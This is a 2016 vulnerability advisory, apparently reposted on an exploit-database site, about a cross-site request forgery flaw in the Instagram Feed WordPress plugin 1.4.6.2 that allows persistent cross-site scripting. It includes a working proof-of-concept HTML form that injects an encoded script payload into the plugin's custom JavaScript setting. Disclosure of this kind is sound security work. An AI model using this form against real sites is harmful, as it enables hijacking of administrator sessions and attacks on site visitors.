WordPress Instagram Feed 1.4.6.2 Cross Site Scripting / Cross Site Request Forgery

2016.11.22
Credit: Sipke Mellema
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

------------------------------------------------------------------------ Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF ------------------------------------------------------------------------ Sipke Mellema, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0014 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the Instagram Feed WordPress Plugin version 1.4.6.2. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in Instagram Feed WordPress Plugin version 1.4.7. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html The settings page of the Instagram Feed plugin does not perform CSRF checks. It's possible to change all settings in the plugin by making an authenticated administrator perform a request to change the settings (CSRF). It's possible to change the Instagram access token and id to show images of other users. It's also possible to inject malicious JavaScript in the Customize section, to perform Persistent Cross-Site Scripting. Any user visiting the Instagram Feed will be injected with the attackers payload after the CSRF attack. Proof of Concept Have an authenticated admin visit a webpage with the following form: <html> <body> <form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST"> <input type="hidden" name="sb&#95;instagram&#95;settings&#95;hidden&#95;field" value="Y" /> <input type="hidden" name="sb&#95;instagram&#95;customize&#95;hidden&#95;field" value="Y" /> <input type="hidden" name="sb&#95;instagram&#95;width" value="100" /> <input type="hidden" name="sb&#95;instagram&#95;width&#95;unit" value="&#37;" /> <input type="hidden" name="sb&#95;instagram&#95;height" value="100" /> <input type="hidden" name="sb&#95;instagram&#95;height&#95;unit" value="&#37;" /> <input type="hidden" name="sb&#95;instagram&#95;background" value="&#35;474747" /> <input type="hidden" name="sb&#95;instagram&#95;sort" value="none" /> <input type="hidden" name="sb&#95;instagram&#95;num" value="20" /> <input type="hidden" name="sb&#95;instagram&#95;cols" value="4" /> <input type="hidden" name="sb&#95;instagram&#95;image&#95;res" value="auto" /> <input type="hidden" name="sb&#95;instagram&#95;image&#95;padding" value="5" /> <input type="hidden" name="sb&#95;instagram&#95;image&#95;padding&#95;unit" value="px" /> <input type="hidden" name="sb&#95;instagram&#95;show&#95;header" value="on" /> <input type="hidden" name="sb&#95;instagram&#95;header&#95;color" value="" /> <input type="hidden" name="sb&#95;instagram&#95;show&#95;btn" value="on" /> <input type="hidden" name="sb&#95;instagram&#95;btn&#95;background" value="" /> <input type="hidden" name="sb&#95;instagram&#95;btn&#95;text&#95;color" value="" /> <input type="hidden" name="sb&#95;instagram&#95;btn&#95;text" value="Load&#32;More&#46;&#46;&#46;" /> <input type="hidden" name="sb&#95;instagram&#95;show&#95;follow&#95;btn" value="on" /> <input type="hidden" name="sb&#95;instagram&#95;folow&#95;btn&#95;background" value="" /> <input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text&#95;color" value="" /> <input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text" value="Follow&#32;on&#32;Instagram" /> <input type="hidden" name="sb&#95;instagram&#95;exclude&#95;words" value="" /> <input type="hidden" name="sb&#95;instagram&#95;include&#95;words" value="" /> <input type="hidden" name="sb&#95;instagram&#95;hide&#95;photos" value="" /> <input type="hidden" name="sb&#95;instagram&#95;block&#95;users" value="" /> <input type="hidden" name="sb&#95;instagram&#95;custom&#95;css" value="" /> <input type="hidden" name="sb&#95;instagram&#95;custom&#95;js" value="&#125;&#13;&#10;&#125;&#41;&#59;&lt;&#47;script&gt;&lt;script&gt;alert&#40;1&#41;&#59;&lt;&#47;script&gt;&#13;&#10;" /> <input type="hidden" name="submit" value="Save&#32;Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> The Custom JavaScript section will now be saved with the attacker's JavaScript payload. ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top